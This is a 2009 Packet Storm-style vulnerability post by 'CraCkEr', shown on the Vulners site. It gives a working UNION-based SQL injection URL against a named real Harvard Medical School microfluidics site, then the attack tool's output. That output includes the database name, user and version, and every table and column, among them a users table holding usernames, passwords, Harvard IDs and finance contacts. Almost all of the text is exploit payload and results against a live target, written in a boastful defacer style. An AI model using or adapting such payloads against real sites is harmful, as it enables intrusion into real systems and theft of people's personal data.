Lucene search
Harvard SQL Injection
šļøĀ 25 Mar 2009Ā 00:00:00Reported byĀ CraCkErTypeĀ 
Ā packetstormšĀ packetstormsecurity.comšĀ 21Ā Views
Harvard SQL Injection document with remote SQL injection vulnerability, high impact, and database access
Show more
`ļ»æāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā
āā C r a C k E r āā
āā T H E C R A C K O F E T E R N A L M I G H T āā
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā
āāāāā From The Ashes and Dust Rises An Unimaginable crack.... āāāāā
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā
āā [ EZINE ] āā
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā
: Author : CraCkEr : : :
ā Website : harvard.edu ā ā Famous Sites Can Be ā
ā Vuln Type: Remote SQL Injection ā ā ā
ā Method : GET ā ā Olso Vulned ā
ā Critical : High [āāāāāāāā] ā ā ā
ā Impact : Database access ā ā ā
ā āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā ā
ā DALnet #crackers āā
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā
: :
ā Release Notes: ā
ā āāāāāāāāāāāāā ā
ā Typically used for remotely exploitable vulnerabilities that can lead to ā
ā system compromise. ā
ā ā
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā
āā Exploit URL's āā
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā
[+] Remote SQL
http://microfluidics.hms.harvard.edu/index.php?catid=-1 union select 1,database(),3--
[+] Attack Results
[+] URL:http://microfluidics.hms.harvard.edu/index.php?catid=-1+union+select+1,Attack,3--
[+] Evasion Used: "+" "--"
[+] 05:33:35
[+] Gathering MySQL Server Configuration...
Database: MICROFLUIDICS
User: [email protected]
Version: 5.0.45-DEBIAN_1~BPO.1-LOG
[+] Showing Tables & Columns from database "MICROFLUIDICS"
[+] Number of Tables: 11
[Database]: MICROFLUIDICS
[Table: Columns]
[0]HMS_CONTENT_LEAF: NID,TABLE_NAME
[1]HMS_EQUIPMENT: ID,NAME,IMAGE_PATH1,IMAGE_PATH2,IMAGE_PATH3,IMAGE_PATH4,PDF_PATH1,PDF_NAME1,PDF_PATH2,PDF_NAME2,PDF_PATH3,PDF_NAME3,PDF_PATH4,PDF_NAME4,DESC_LONG,USE_TYPE,MAX_USERS,MAX_HOURS,MIN_HOURS,MIN_USER_STATUS
[2]HMS_EVENTS: ID,DATE_TIME,NAME,HOST,LOCATION,NUM_SLOTS,DESC_LONG
[3]HMS_FEATURES: ID,IMG_PATH,TITLE,CAPTION,LINK,PAUSE
[4]HMS_REGS: EID,UID
[5]HMS_RESERVATIONS: UID,EID,START,END,VERIFIED
[6]HMS_SEMINARS: ID,DATE_TIME,NAME,HOST,DESC_LONG,LOCATION
[7]HMS_SESSIONS: SESSION_ID,SESSION_DATA,EXPIRES
[8]HMS_SITE_CONTENT: ID,CATID,LINK_NAME,TITLE,DESC_LONG,EDIT_TYPE,IS_TOP_PAGE
[9]HMS_SITE_SECTIONS: ID,LABEL,RANK,PUBLIC
[10]HMS_USERS: ID,USERNAME,PASSWORD,NAME_FIRST,NAME_LAST,TITLE,AFFILIATION,DEPARTMENT,LAB,PHONE,FAX,ADDRESS,EMAIL,HMS_STATUS,BILLING_CODE,HUID,HUID_EXP,FINANCE_NAME_FIRST,FINANCE_NAME_LAST,FINANCE_PHONE,FINANCE_EMAIL,AGREEMENT_STATUS,APPROVAL_STATUS,ACTIVE_STATUS
[-] [05:35:30]
[-] Total URL Requests 89
[-] Done
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā
Greets:
The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL .
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā
āā Ā© CraCkEr 2009 āā
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactĀ us for a demo andĀ discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo25 Mar 2009 00:00Current
0.4Low risk
Vulners AI Score0.4